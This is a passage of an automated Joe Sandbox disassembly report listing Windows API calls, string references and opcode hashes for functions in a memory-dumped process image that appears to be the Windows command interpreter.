                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$DPATH$PATH
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3731854180-3148396303
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: acf12756a4032cce538779d70275ad7b40bebf8ba85dcc7de6ce343f80ce3ea9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28219A2AF09752C0EA54BB55EC6027BA3A0BF84B84FC88136DE0E473D6DF2CE4418360
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: *.*$????????.???
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3392835482-3870530610
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5f20ee05c444da9cd093de5041372b282804257a6873221e1eb1bf641a78b2fc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB11C225B24B6281E768AB2ABD6053BB7E0FF44B90F985031DE8D47B85DF3DE4428710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 383729395-2781220306
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: iswspacewcschr
• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
• API String ID: 287713880-1183017076
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: KERNEL32.DLL$SetThreadUILanguage
• API String ID: 1646373207-2530943252
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
APIs
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
Similarity
• API ID: memset$DriveFullNamePathType
• String ID:
• API String ID: 3442494845-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
Similarity
• API ID: File_get_osfhandle$TimeWrite
• String ID:
• API String ID: 4019809305-0
Similarity
• API ID: wcstol$lstrcmp
• String ID:
• API String ID: 3515581199-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d57269d6f2d783b0e33b3cb296fe8eadb70ae1a268e1dbc21a504202adeb425
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6212935A18B4687E614BB11AC2427BF6A1FF94B81F894135EA0E07795CF3CE4418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1029679093-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 648f10d67281140203619d4de7fafdffd58f3cadffb3b7db4f49e3fa1cc95902
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28313A36709B858AEB209F61DC643EAA7A4FB89B88F848175CA4D4B748DF3CD645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c05f5a8e4f331155ff3ab3e5f379e70f668a94b4df3bf46be910e9d743e3f00c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C218865608B45C6EE04BB55AD2007BFBA1FF8ABE0B999130DE1E43795DF3CE4018720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC3D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: towupper.MSVCRT ref: 00007FF706EC3D2F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: iswalpha.MSVCRT ref: 00007FF706EC3D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: towupper.MSVCRT ref: 00007FF706EC3D75
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC3DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EB6ABF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706EB6AD3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF706EB6AE8,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF706EB6AE8,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B97
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B84: RtlFreeHeap.NTDLL ref: 00007FF706EB6BAF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB6AF1,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B39
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B30: RtlFreeHeap.NTDLL ref: 00007FF706EB6B4D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB6AF1,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B59
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EB6B03
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706EB6B17
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB6D0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB6E7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB701
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB715
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD01C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD033
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD06D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD07F
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB5A2E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF706EB5A4F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED37AA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF706ED37D2
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 22757656-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF706ED5433,?,?,?,00007FF706ED69B8,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED56C5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED56D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF706ED5433,?,?,?,00007FF706ED69B8,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED56FD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED5711
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
